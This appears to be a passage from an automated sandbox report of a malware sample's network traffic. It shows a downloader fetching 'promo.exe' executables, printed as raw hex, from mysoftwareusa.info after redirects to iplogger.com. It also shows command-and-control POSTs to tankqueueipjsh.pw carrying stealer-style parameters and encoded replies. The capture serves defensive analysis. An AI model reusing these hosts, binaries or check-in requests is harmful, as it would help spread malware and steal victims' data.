                                                                                                                                                                                                                                                                        Data Ascii: jIhM_^[]U=hMVhL$#)=gM93fD$D$PL$1=eMM~`'hML$)$(VjPML$$T$$3F$$ h$(2YD$P$4P
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.499991894 CET1340INData Raw: 20 1a 4d 00 85 c0 0f 85 b6 f6 03 00 b9 0c 1a 4d 00 e8 72 5a 00 00 b9 fc 19 4d 00 e8 68 5a 00 00 b9 ec 19 4d 00 e8 5e 5a 00 00 b9 dc 19 4d 00 e8 54 5a 00 00 b9 cc 19 4d 00 e8 4a 5a 00 00 b9 bc 19 4d 00 e8 40 5a 00 00 5f b9 ac 19 4d 00 5e e9 34 5a
                                                                                                                                                                                                                                                                        Data Ascii: MMrZMhZM^ZMTZMJZM@Z_M^4ZSQQUkl$0=#MVWE#M<5#M3jZQb=#MY3E#MM~B=#Mv;}=#M3M@MEwEM3j


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        9192.168.2.55018737.1.198.25180
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.620887041 CET147OUTGET /stats/3/0/0 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.3
                                                                                                                                                                                                                                                                        Host: mysoftwareusa.info
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:50.985933065 CET269INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:34:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Length: 3
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        location: https://iplogger.com/1gWvm4
                                                                                                                                                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.376455069 CET147OUTGET /stats/3/1/0 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.3
                                                                                                                                                                                                                                                                        Host: mysoftwareusa.info
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:52.770020008 CET269INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:34:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Length: 3
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        location: https://iplogger.com/1gYvm4
                                                                                                                                                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.636115074 CET146OUTGET /archives/5 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.3
                                                                                                                                                                                                                                                                        Host: mysoftwareusa.info
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926584005 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:34:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                        Content-Length: 2713088
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=promo.exe
                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 da fa 65 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 94 06 00 00 8c 03 00 00 00 00 00 00 50 6a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 6a 00 00 04 00 00 f0 74 29 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 60 0a 00 95 00 00 00 00 30 08 00 6a 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 0a 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 08 00 00 10 00 00 00 6e 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6a 24 02 00 00 30 08 00 00 10 01 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 0a 00 00 02 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 3b 00 00 70 0a 00 00 02 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 65 62 65 79 74 7a 6b 00 e0 24 00 00 70 45 00 00 d2 24 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6b 7a 6e 70 66 74 62 00 10 00 00 00 50 6a 00 00 02 00 00 00 64 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELeePj@`jt)@m`0j$a n@.rsrcj$0~@.idata `@ ;p@jebeytzk$pE$@ukznpftbPjd)@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926654100 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926750898 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926791906 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926841021 CET1340INData Raw: e8 84 b7 5c f9 08 99 12 e7 8f e5 7b 3a a9 6b 01 db 05 fb 14 a8 46 b4 f1 1f 63 08 e8 cf 8e 38 d1 1b ad ef cb fb 9f f7 cc 10 40 3b ab b3 e7 f6 35 fe 16 03 ad f8 d6 e3 27 13 92 d4 e2 08 0b c4 e1 d9 89 1d 83 c5 e9 7c 3e 62 dd e6 f2 ba 1a 17 4b ed 64
                                                                                                                                                                                                                                                                        Data Ascii: \{:kFc8@;5'|>bKd9~"a0$(v+&C9Bn3`!z\n 08H _X[kZW$awcQzm4D-i5dEbm$K:V43q
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926879883 CET1340INData Raw: af ab 1d 5b d8 a6 a7 70 e2 b4 f6 3f e7 cf 66 1b ac 21 9c a8 22 6c fc 9e 03 28 3c 22 a9 b4 fd 97 8f 60 4e 5e 80 9c 81 91 7d e3 47 aa 82 65 83 e9 a8 9c 81 7d bc df dd 4d 4c a0 96 19 92 df 08 97 1f 32 ab 4e df e5 46 6f 68 ed b0 6f e7 91 07 70 24 59
                                                                                                                                                                                                                                                                        Data Ascii: [p?f!"l(<"`N^}Ge}ML2NFohop$Ykf:qa}LZprf$8{6w7A'(--zngCchJ@I`3u'#@c$YqBG@&/mk+0J'wR}A
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926928997 CET534INData Raw: 4e 96 be 9e 2d 0f 7e 1d fe bf c1 35 c3 a9 61 d8 fe 17 e0 bf 35 08 4f e9 cd fd 5f 17 ce 78 2d f1 83 12 5f c0 ce f8 cc c1 4a 2b 07 cb f9 12 e4 fe 21 40 32 54 d1 37 ca ab 17 32 1b 94 40 07 f8 dd 5a 92 5e 73 06 86 63 7d ef 7e e1 16 6e f5 9a a4 19 78
                                                                                                                                                                                                                                                                        Data Ascii: N-~5a5O_x-_J+!@2T72@Z^sc}~nx=5)Yg'5| ]6{D{~6MP1U&q?w>$4WvGqdRwW/KNC@rCgKXM>:"D
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.926968098 CET1340INData Raw: 85 11 1e e8 5d 0a 1b 34 48 d9 e6 8c 3c 09 1e 42 09 eb e7 e3 c3 a6 27 fa fd d5 5a d7 a4 a8 1c 25 12 0d 23 83 f6 2d 03 20 e5 8d 5b 1a 09 9d 88 9c d7 cc 3a dc 5c 0d 2b b5 d7 7f 67 dc 6d d0 3a de 57 3d 0a 28 5d 2d 2b da 9d 00 5b d9 f6 e7 97 35 95 d6
                                                                                                                                                                                                                                                                        Data Ascii: ]4H<B'Z%#- [:\+gm:W=(]-+[5nf*hmi~N- )FK]A+"+s8A;0L(c{8].wHw:>n[<5NUcG_mXuydyR#[7&Q_]
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.927006006 CET1340INData Raw: be 93 51 f6 5e d8 f9 a6 55 e5 e5 be 9c 08 30 b4 7d b2 06 99 79 d7 ed 76 b6 f2 5b 41 7e 2e 89 7d df 3c 31 da 68 ce 0e f5 10 58 42 bf 43 b5 69 56 26 3f f2 ac 3a e8 91 c4 6c 9a 7a 8c af ee 84 3f 77 9c db 44 55 d7 17 28 d4 18 58 9d cc f3 b0 49 a1 be
                                                                                                                                                                                                                                                                        Data Ascii: Q^U0}yv[A~.}<1hXBCiV&?:lz?wDU(XI,k'`*?l~[~r!fY_(#L*;O``CRk5cnm5:zGqp:lD]e%JEo gLplE1()2;:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:53.927051067 CET1340INData Raw: 66 c1 2e 14 ff f8 e4 28 4c 0c c2 b4 57 6e 21 57 af a3 83 c7 be ba e7 25 71 ce ee d3 a6 6d 33 9a 1f 90 f5 a0 a5 40 52 ef 3f 78 58 b5 c6 ad 4a 90 b7 1c 3f 5b ae c4 d3 60 f3 05 83 b6 62 c6 8b da 3f 09 71 90 cf af 3c 97 57 65 af 14 58 92 9c a7 e4 64
                                                                                                                                                                                                                                                                        Data Ascii: f.(LWn!W%qm3@R?xXJ?[`b?q<WeXdl?oqGu" EatZ%|$&&_\z N@[@c:S-\%;MUPSB #-NSpE-{
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:54.106959105 CET1340INData Raw: bf f3 73 93 33 c1 77 54 eb e0 da 4e 8a be 1e 86 b8 73 fd 55 84 26 b0 5d e4 18 8a aa 34 96 5f 71 67 49 a6 f3 ee 06 15 e3 c1 85 33 2a c5 d9 30 9d a0 25 35 78 c9 02 38 4e 68 c6 5d fe a8 aa fb 41 70 6b 78 92 de 88 16 54 26 5d 74 e0 de 0f df 8d 03 7f
                                                                                                                                                                                                                                                                        Data Ascii: s3wTNsU&]4_qgI3*0%5x8Nh]ApkxT&]t{V/'9^*px'ryx3a\"Huu|^&+VI^|jrIWq^75GAc94YRO]^*Y|_
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.174212933 CET146OUTGET /archives/7 HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.4.5
                                                                                                                                                                                                                                                                        Host: mysoftwareusa.info
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.471856117 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:39 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                        Content-Length: 2590208
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=promo.exe
                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 d8 8f fd b9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 bc 04 00 00 38 03 00 00 00 00 00 00 c0 51 00 00 20 00 00 00 e0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 51 00 00 04 00 00 35 46 28 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 20 08 00 95 00 00 00 00 e0 04 00 56 35 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 04 00 00 20 00 00 00 d8 01 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 56 35 03 00 00 e0 04 00 00 f4 02 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 20 08 00 00 02 00 00 00 ec 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 26 00 00 40 08 00 00 02 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 77 64 61 69 6f 6e 6e 00 a0 22 00 00 20 2f 00 00 94 22 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6b 67 70 69 75 76 69 00 20 00 00 00 c0 51 00 00 02 00 00 00 84 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PEL08Q @ Q5F(@m V5! @.rsrcV5@.idata @ &@@nwdaionn" /"@xkgpiuvi Q'@


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        10192.168.2.550196104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.037519932 CET318OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.037570000 CET62OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.392143965 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=in6su9fmq3toujtgj525f3bpan; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsZ7hv0im8qBjqZ5VmXvT2AXW0x8LnU5YkqwNkolAfFjSwDT6hkvJRG8AHLKfsRHFpxked%2FEAGxSVAFSSJH4XVLF2UJr1Gb5eteknGLizOooljzmaOyXx1m%2BNR%2FgOj%2FWVwvT%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.392167091 CET104INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 38 62 64 37 35 32 64 31 37 2d 49 41 44 0d 0a 0d 0a 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e8f8bd752d17-IAD2ok
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.392180920 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.393985033 CET319OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 72
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.394021988 CET126OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4d 65 44 4e 4e 31 26 6a 3d 65 32 31 31 30 62 33 32 32 35 31 39 31 34 66 36 63 31 30 36 30 34 64 35 31 62 38 39 66 37 61 61 26 76 65 72 3d 34 2e 30
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&lid=MeDNN1&j=e2110b32251914f6c10604d51b89f7aa&ver=4.0
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.666970015 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=q7g8hbqrhts7oapc1jm8g8k8fc; expires=Sun, 31 Mar 2024 07:21:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:05 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=smlgbd%2FwCZyMVqCuAFR6BO9lwIefiZyNkdx5yAEg3wZkk2kZiOuUdqbMIpMlUW3W8bkfUx%2FDccEHvdlVbyRK8lQANiRdDGFAQxfz5eTjlMUZkdeUoJhhLm4aTylQbREPeD1AsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667016029 CET626INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 38 66 61 66 66 66 32 32 64 31 37 2d 49 41 44 0d 0a 0d 0a 32 31 30 0d 0a 37 44 47 43 6e 76 38 50 6e 59 62 44 32 50 4f 76 66 64 64 6d 44 66 6f 64 79 46 36 65 31 6b 69 52 6d 68 58 59 64 56 30 58
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e8fafff22d17-IAD2107DGCnv8PnYbD2POvfddmDfodyF6e1kiRmhXYdV0XPKKXE/S8xTuxpLC90ZUbtgp+nzHqP/r0cuXoYL1Zf3JEgNZq+byaYb+84b2ZzRy7BGyRcrgy/b4k9vJwuxE8e1HHiVTj9JFm8O6u+t+NGK1EN9hQrSr/myni8TelWSY1WczOC6DwlG307qW6lsAatgNslXigMvuwJ
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.667051077 CET1340INData Raw: 34 61 32 30 0d 0a 44 62 6b 43 59 70 35 33 75 48 79 79 39 43 33 72 75 43 2f 36 4e 7a 52 35 58 63 79 50 56 4b 4c 64 6c 32 37 30 36 4f 4f 50 6b 73 4d 52 73 68 49 76 68 7a 47 7a 66 50 75 34 61 71 75 34 63 37 34 62 50 33 4a 51 78 49 68 65 35 2f 65 51
                                                                                                                                                                                                                                                                        Data Ascii: 4a20DbkCYp53uHyy9C3ruC/6NzR5XcyPVKLdl2706OOPksMRshIvhzGzfPu4aqu4c74bP3JQxIhe5/eQZ/joqLKazRO6B2mQdK029L4p+/g39Fc4bR6Yzmjt7JBmv/vvo9HKE/VcL5B/rD/xtSb083yxGzB9XsiAVuPyl2z46qS6lsUQuQ9p2DHqO+T0crPUfL4BJDVBjpcT5/DdNb/npbqQzRenBH2cfKwy9bsg/Pl5sB44c
